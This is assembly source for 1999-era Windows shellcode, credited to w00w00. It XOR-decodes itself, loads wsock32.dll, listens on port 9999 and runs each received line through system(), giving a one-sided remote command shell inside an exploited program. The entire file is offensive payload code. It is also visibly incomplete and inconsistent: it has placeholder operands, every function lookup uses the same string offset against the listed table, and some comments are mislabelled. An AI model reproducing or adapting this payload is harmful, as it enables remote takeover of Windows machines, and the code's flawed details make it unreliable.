# Windows shell (one-sided command.com)
# Copyright (C) March 1999, Matt Conover & w00w00 (WSD)
#
# Can give input, but will not see output
# This will only allow 1 connection at a time (for simplicity)
#
# Because Windows doesn't allow interrupts, we push arguments on the stack
# and 'call' functions.  The catch is that the addresses of necessary 
# functions will vary between programs.  Therefore, we use the shellgen
# to "plug" in our guessed (or acquired) addresses.
#
# Notes:
# %edi = first of pre-defined data
# %esi = address of module handle
# %ecx = client (accept()) fd
# %edx = server (socket()) fd

jmp init			# cheap hack (to get data addresses)
start: popl %edi		# pop saved eip into edi

# ---------------------------------------------------------------------
# First we must un'xor all bytes in the shellcode, except for the first
# few, which was left unxor'd (this code here) so that we could decrypt

# We start at our ascii strings, and move backwards until we get to 
# the end of this code (un-xor'd code)

pushl %edi			# save the old edi

call blah			# this will be used as an index address
blah: popl %esi			# on where to stop xor'ing

movl %esi,%eax			# save ending address for XOR
subl $0x5,%eax			# note: we are xor'ing end addr->start addr

addl $0xXX,%edi			# offset to beginning of xor'd code

xorloop:
   decl %edi			# start at top, decrease addr to bottom
   cmpl whatever,%edi		# see if we've reached decrypted all data
   jle xorloop_end		# if we've reached last address.. end

   xorb $0x1,(%edi)		# otherwise, decrypt/xor the byte
   jmp xorloop

xorloop_end: popl %edi		# restore the old edi

# -------------------------------------
# START OF XOR'D BLOCK

# Set all 0xff's to 0x00's (null chars)
# NOTE: the 0xffffffff's used for LoadLibrary() and GetProcAddress() will
# be modified by shellgen, and will not exist at run-time

pushl %edi			# save %edi (saved eip)
decl %edi			# start 1 address below

leal 0x56(%edi),%eax		# store the final 0xff address

setnull_loop:
   cmpl %edi,%eax		# see if we're at end of 0xff'd data
   je setnull_end		# end if so

   incl %edi			# address pointer by 1
   cmpb $0xff,(%edi)		# see if it's 0xff
   jne setnull_loop		# if not, continue

   addb $0x1,(%edi)		# set 0xff'd byte to null
   jmp setnull_loop

setnull_end: popl %edi		# restore the old %edi (saved eip)

# ---------------------------------------------------------------------

# NOTE: All bytes from this point on will be XOR'd (encrypted) to prevent
# nulls in the call functions (et. al.)

LoadLibrary:
   leal 0x8(%edi),%eax		# 0x8(%edi) = address of libname
   pushl %eax

   call *%edi			# call LoadLibrary("wsock32.dll");
   movl %eax,%esi		# store retval (mod handle) in esi

   # ----------------- WSAStartup()

# Note: in practice, this isn't needed.  A program we're trying to exploit
# will have already called WSAStartup() if we are communicating with it
# remotely.  Therefore, we'll leave the code but comment it out.

# WSAStartup:
#  subl $0x190,%esp		# allocate 400 bytes for WSADATA
#  movl %esp,%ebx		# address of WSADATA (used as arg 2)

#  push %ebx			# &wsaData
#  push $0x101			# MAKEWORD(1, 1) result = wsock v1.1

#  leal 0x14(%edi),%eax		# function name ("WSAStartup")
#  call getprocaddr		# function addr returned in %eax

#  call *%eax			# call ret. addr. (WSAStartup()'s addr)

   # ----------------- socket()

socket:
   xorl %eax,%eax		# clear out %eax

   pushl %eax			# IPPROTO_IP (protocol)
   pushl $0x1			# SOCK_STREAM (type)
   pushl $0x2			# AF_INET (family)

   leal 0x1f(%edi),%eax		# function address ("socket")
   call getprocaddr		# function addr returned in %eax

   call *%eax			# call ret. addr. (socket()'s addr)
   movl %eax,%edx		# store server fd in edx

   # ----------------- bind()

bind:
   pushl $0x10			# sockaddr size in bytes (16 bytes)

   subl $0x10,%esp		# allocate mem for sockaddr
   movl %esp,%ebx		# address of sockaddr
   pushl %ebx			# sockaddr's address

   xorl %eax,%eax
   movb $0x10,%al		# zero 0x10 (16) bytes
   call bzero			# zero out sockaddr (ebx = ptr)

   # NOTE - this the structure order may vary between compilers
   movb	$0x2,(%esp)		# AF_INET (sockaddr->sin_family)
   movl $0xf27,0x4(%esp)	# port 9999, in NBO (sockaddr->sin_port)

   pushl %edx			# server fd

   leal 0x1f(%edi),%eax		# function name ("bind")
   call getprocaddr		# function addr returned in %eax

   call *%eax			# call ret. addr. (bind()'s addr)

   # ----------------- listen()

listen:
   xorl %eax,%eax		# clear out %eax

   pushl %eax			# number of backlogs
   pushl %edx			# server fd

   leal 0x1f(%edi),%eax		# function name ("listen")
   call getprocaddr		# function addr returned in %eax

   call *%eax			# call ret. addr. (listen()'s addr)

while_loop1:

      # ----------------- accept()

accept:
      # setup 3rd arg for accept()
      subl $0x4,%esp		# allocate room for sockaddr len
      movl $0x10,(%esp)		# size of sockaddr (16 bytes)
      movl %esp,%ebx		# load %ebx with socklen's address (int *)

      pushl %ebx		# socklen address

      # setup 2nd arg for accept()
      subl $0x10,%esp		# allocate client's sockaddr (16 bytes)
      movl %esp,%ebx		# address of sockaddr

      pushl %ebx		# sockaddr address
      pushl %edx		# server fd

      leal 0x1f(%edi),%eax	# function name ("listen")
      call getprocaddr		# function addr returned in %eax

      call *%eax		# call ret. addr. (listen()'s addr)

      # ----------------------

      movl %eax,%ecx		# store new client fd here

      subl $0x100,%esp		# size of buffer (256 bytes)
      movl %esp,%ebx		# address of buffer

      movl %ebx,%ecx		# ecx = buf ptr

      movl $0x100,%eax		# zero 0x100 (256) bytes
      call bzero		# zero out buf (ebx = ptr)

subwhile_loop1:
      # ----------------- recv()

recv:
      xorl %eax,%eax		# clear out %eax

      pushl %eax		# flags
      pushl $0x1		# buffer len (1 char)

      pushl %ecx		# pointer to buf
      pushl %edx		# client fd

      leal 0x1f(%edi),%eax	# function name ("recv")
      call getprocaddr		# function addr returned in %eax

      call *%eax		# call ret. addr. (recv()'s addr)

      xorl %ebx,%ebx		# clear out %ebx

      cmpl %ebx,%eax		# compare recv() retval to 0
      jl subwhile_end1		# if < 0, break (i.e., SOCKET_ERROR)
      
      # ----------------------

      cmpb $0x1f,(%ecx)		# 0x1f = last ascii code before space
      jle noprint		# if it's < ascii code 0x1f, end buffer

      incl %ecx			# increase bufptr by 1 byte
      jmp subwhile_loop1	# get next char

      noprint:
         xorl %eax,%eax		# clear out %eax
         movl %eax,(%ecx)	# null terminate buffer
				# fall into system() to exec buf

      # ----------------- system()

system:
      leal 0x1f(%edi),%eax	# function name ("system")
      call getprocaddr		# function addr returned in %eax

      call *%eax		# call ret. addr. (system()'s addr)

      # --------------------------

      movl $0x100,%eax		# zero 0x100 (256) bytes
      call bzero		# zero out sockaddr (ebx = ptr)

      movl %ebx,%ecx		# reset buf ptr to first of buf

jmp subwhile_loop1

subwhile_end1:			# where we break to
				# continue on below

   # ------------------------------------------------------
   # closesocket()

closesocket:
   pushl %ecx			# client fd

   leal 0x43(%edi),%eax		# function name ("closesocket")
   call getprocaddr		# function addr returned in %eax

   call *%eax			# call ret. addr. (closesocket()'s addr)

jmp while_loop1

# -------------------------------------------------------------------

getprocaddr:
   pushl %eax			# function name (caller set %eax)
   pushl %esi			# push the module returned by LoadLibrary()

   leal 0x4(%edi),%ebx		# address of GetProcAddress()
   call *%ebx			# call GetProcAddress(mod, funcname)

   ret				# return because this is called as a proc

# -------------------------------------------------------------------

bzero:
   pushl %ebx			# save %ebx (used as pointer)
   pushl %ecx			# save %ecx (used to hold 0x0)

   loop:
      xorl %ecx,%ecx		# clear out %ecx

      movb %cl,(%ebx)		# set byte to null
      incl %ebx			# increase pointer

      decl %eax			# decrease counter

      cmpl %ecx,%eax		# compare counter = 0
      jle endloop		# if <= 0, break;

      jmp loop			# continue looping

endloop: 
   popl %ecx			# restore old %ecx (used to hold 0x0)
   popl %ebx			# restore old %ebx (used as pointer)

   ret
# ----------------------------

# END OF XOR'D BLOCK

init: call start		# used to set eip as an index

# -------------------------------------------------------------------

# These 2 will be modified by shellgen.. don't touch!
.byte 0xff,0xff,0xff,0xff	# LoadLibrary(), (%edi)
.byte 0xff,0xff,0xff,0xff	# GetProcAddress(), 0x4(%edi)

# I use 0xff to indicate "end of string" (we can't use nulls)

.ascii "wsock32.dll"		# 11 bytes, 0x8(%edi)
.byte 0xff			# 1 byte

# -------------------------------------------------------------------

# WSAStartup() will usually not be used, but we're leaving it anyway.
.ascii "WSAStartup"		# 10 bytes, 0x14(%edi)
.byte 0xff			# 1 byte

.ascii "socket"			# 6 bytes, 0x1f(%edi)
.byte 0xff			# 1 byte

.ascii "bind"			# 4 bytes, 0x26(%edi)
.byte 0xff			# 1 byte

.ascii "listen"			# 6 bytes, 0x2b(%edi)
.byte 0xff			# 1 byte

.ascii "accept"			# 6 bytes, 0x32(%edi)
.byte 0xff			# 1 byte

.ascii "recv"			# 4 bytes, 0x39(%edi)
.byte 0xff			# 1 byte

.ascii "send"			# 4 bytes, 0x3e(%edi)
.byte 0xff			# 1 byte

.ascii "system"			# 6 bytes, 0x43(%edi)
.byte 0xff			# 1 byte

.ascii "closesocket"		# 11 bytes, 0x4a(%edi)
.byte 0xff			# 1 byte